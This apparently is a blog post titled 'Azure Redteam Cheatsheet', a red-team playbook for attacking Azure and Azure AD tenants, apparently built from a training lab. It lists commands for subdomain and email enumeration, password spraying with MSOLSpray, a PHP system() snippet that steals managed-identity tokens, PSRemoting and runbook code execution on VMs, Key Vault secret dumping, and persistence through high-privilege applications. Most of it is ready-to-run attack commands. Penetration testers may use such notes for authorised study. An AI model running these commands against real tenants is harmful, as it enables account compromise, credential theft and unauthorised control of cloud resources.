Azure Redteam Cheatsheet

I. Reconnaissance (external)

Find the subdomain of the target

Using microBurst

. \Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose

enum email:

o365creeper.py -f emails.txt -o validemails.txt

II. Reconnaissance (internal)

Using RoadTool

 roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui

Using StormSpotter

python ssbackend.pyz
quasar.cmd serve -p 9091 --history

Using Bloodhound, Azurehound

. C:\AzAD\Tools\AzureHound\AzureHound.ps1
PS C:\AzAD\Tools> Invoke-AzureHound -Verbose

III. Initial attack

Brute force

MSOLSpray.ps1
PS Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose

Illicit Consent Grant attack.

Using

IV. Lateral movement

Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code:

<?php 

system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

Check Deployments

Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>

Save deployment template

Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>

VM interaction:

access the VM using PSRemoting

$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess

Transfer file:

Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ –Verbose

Excute a command:

Invoke-Command -Session $sess -ScriptBlock{ls C:\Users\}

Using hybridworker

List Automation Hybrid Wordker Group

Get-AzAutomationHybridWorkerGroup -AutomationAccountName <> -ResourceGroupName

Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose

Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Dump PRT

Using PRT in chrome

Abuse Dynamic group

Abuse proxy application

Check azure connect, authentication type

 Get-ADSyncConnector

Cloud to On-prem:

abuse PTA,

obtain PRT cookie

Readmore: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

Global Administrator or Intune Administrator role can execute
PowerShell scripts on an enrolled Windows device

On-prem to Cloud:

abuse PHS

V. Persistence

Add a new application that has high permissions and then use that for persistence

Useful command:

Login:

az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds

Azurehound

$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose

Get all users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName  => only get only UPNs

Show GAs

Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember

List all custom directory roles:

Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName

List resource (AzAD)

Get-AzResource

Get all the role assignments for the test user

Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>

Check the definition of this role

Get-AzRoleDefinition -Name <Role_name>

List all the VMs where the current user has at least the Reader role

Get-AzVM | fl
or
az vm list

List all App Services. We filter on the bases of ‘Kind’ proper otherwise both appservices and function
apps are listed

Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list web app service)
az webapp list --query "[].[name]" -o table (List only the names of app services)

To list Function Apps

Get-AzFunctionApp

list storage accounts

Get-AzStorageAccount | fl
az storage account list

is the readable keyvaults for the current user

Get-AzKeyVault
az keyvault list
Get-AzKeyVaultSecret -VaultName
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Container_name> –AsPlainText

Check if there is a user logged-in to az cli on that machine

az ad signed-in-user show

Check if there is a public IP address attached to the VM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile

Get more details about the network interface attached to the VM using the below command

Get-AzNetworkInterface -Name <VM_interface>

Get the public IP address attached to the VM

Get-AzPublicIpAddress -Name <IP_name>

Get AzVM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *

Get information of the group and list principles

Get-AzADGroup -DisplayName <Group_name>

Enumerate the service principals in Azure AD and check the service principal that the AppID xx belong to

 Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl

Disconnect

Disconnect-AzAccount

Check if any extensions is already installed

Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>

Run powershell on the VM from the powershell file

Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: